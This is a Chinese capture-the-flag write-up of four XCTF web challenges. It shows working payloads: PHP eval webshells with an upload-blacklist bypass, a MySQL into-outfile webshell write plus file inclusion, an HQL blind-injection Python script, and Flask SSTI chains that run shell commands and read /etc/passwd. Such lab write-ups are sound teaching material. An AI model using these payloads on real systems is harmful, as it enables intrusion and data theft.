攻防世界(XCTF)WEB(进阶区)write up(四)
ics-07
Web_php_include
Zhuanxv
Web_python_template_injection
ics-07
题前半部分是php弱类型
这段说当传入的id值浮点值不能为1,但是id的最后一个数必须为9,session才能为admin
当id为1a9时可符合上面的要求
看看上传的源码:
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");
}else{
chdir('uploaded');
$f = fopen($filename, 'w');
fwrite($f, $con);
fclose($f);
}
}
?>
利用正则检测的文件后缀名 黑名单模式
突破后缀黑名单思路:
一种是Web中间件的解析漏洞 , 因为已经知道中间件是Apache2 , 使用的是PHP . 所以无非就是Apache解析漏洞或者PHP CGI解析漏洞
一种是通过上传.htaccess文件 , 要使用该功能需要Apache在配置文件中设置AllowOverride All , 并且启用Rewrite模块 , 经过测试发现上传的.htaccess无法生效
[/var/www/html/uploaded/backup/]$ cat /etc/mime.types | grep php #application/x-httpd-php phtml pht php #application/x-httpd-php-source phps #application/x-httpd-php3 php3 #application/x-httpd-php3-preprocessed php3p #application/x-httpd-php4 php4 #application/x-httpd-php5 php5
发现很多文件后缀都使用了application/x-httpd-php这个解析器
其中 phps 和 php3p 都是源代码文件 , 无法被执行 . 而剩下所有的后缀都被正则表过滤 , 所以这种方式也无法成功上传可执行文件
这道题利用了一个Linux的目录结构特性
linux中创建了一个目录为1.php , 都会在其中自动创建两个隐藏文件 .. 和 .
构造:
con=<?php @eval($_POST[qing]);?>&file=qing.php/qing.php/..
Web_php_include
发现phpinfo()可以看到绝对路径 和 phpmyadmin
进入phpmyadmin页面 root直接空密码登录
查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话
测试到/tmp 目录可以写入,也可以包含读取。
于是将一句话写入/tmp,菜刀链接文件包含页面,得到flag
<?php eval(@$_POST['qing']); ?> select "<?php eval(@$_POST['qing']); ?>"into outfile '/tmp/qing.php'
http://111.198.29.45:43025/?page=/tmp/qing.php 菜刀链接
Zhuanxv
XCTF 4th-SCTF-2018
扫描发现 list目录
爆破注入没成功 看看源码
传参方式取图片 站点发现是java fuzz下
这里fuzz时候还要多fuzz下目录 这里是../../WEB-INF/web.xml
配置文件里面写的是Struts2
关于Struts2目录结构
https://www.cnblogs.com/pigtail/archive/2013/02/12/2910348.html
Struts 2框架有两个核心配置文件,其中struts.xml文件主要负责管理应用中的Action映射,以及该Action包含的Result定义等。除此之外,Struts 2框架还包含 struts.properties文件,该文件定义了Struts 2框架的大量属性,开发者可以通过改变这些属性来满足应用的需求。
Struts2在WEB-INF目录的class目录下有个核心的xml文件
读取struts.xml文件
http://111.198.29.45:39585/loadimage?fileName=../../WEB-INF/classes/struts.xml
这里class里面可以看到很多class类名 尝试下载
访问../../WEB-INF/classes/applicationContext.xml,获取class文件路径和项目配置信息、数据库信息
http://111.198.29.45:32744/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml
发现 有个user.hbm.xml项
从user.hbm.xml得知表名和类名映射
逐个下载配置文件class 在com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字
可以看到拼接的sql语句 直接拼接的name和password变量造成注入 这里是hql语句
设计到hql注入
注入payload:
admin%%0Aor%0A%%%3E%
盲注脚本
import requests
s=requests.session()
flag=''
for i in range(1,50):
p=''
for j in range(1,255):
payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
#print payload
url="http://121.196.195.244:9032/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
r1=s.get(url)
#print url
#print len(r1.text)
if len(r1.text)>20000 and p!='':
flag+=p
print i,flag
break
p=chr(j)
Web_python_template_injection
一道有意思的python模版注入(SSTI)
发现存在SSTI 把{{}}中的内容当变量去解析并执行了
FLASK中config是配置为对象 这里使用这个对象的item方法查看信息
config.items()
查查看所有模块
[].__class__.__base__.__subclasses__()
因为如果执行命令需要os模块 这里os模块是在warnings.catch_warnings模块 先找warnings.catch_warnings模块 为第59个
查看warnings.catch_warnings模块的全局函数 利用到的是func_globals.keys()
[].__class__.__base__.__subclasses__()[].__init__.func_globals.keys()
可以看到 linecache函数,os模块就在其中
查看flag文件所在
().__class__.__bases__[].__subclasses__()[].__init__.func_globals.values()[]['eval']('__import__("os").popen("ls").read()' )
{{].__subclasses__()[]("fl4g").read()}}
读取文件 利用到的是object对象下的file类的read函数
[].__class__.__base__.__subclasses__()[]('/etc/passwd').read()
最新文章
- struts2杂记(一)——使用doubleSelect
- C#面向对象设计模式纵横谈——1.面向对象设计模式与原则
- ganglia及ganglia-api相关介绍
- PHP与Java进行通信
- Android基础类之BaseAdapter
- winrt 上的翻书特效组件 源码分享 转载请说明
- Ajax中解析Json的两种方法详解
- Linux on ASUS N550JK4700
- C++中虚函数功能的实现机制
- JQuery中两个ul标签的li互相移动实现方法
- java基础:数组查询,同一数组一个元素最多出现两次
- web.xml 中配置了error-page但不起作用问题
- ADO.NET中的DataSet和DataReader
- LR的响应时间与使用IE所感受时间不一致的讨论
- C++流类库(11)
- 微信小程序计算器Bug版=-=(笔记)
- 大规模数据导入和导出(sqlserver)
- pytorch中的若干问题
- nginx的使用教程
- Linux 防火墙和SELinux的开启和关闭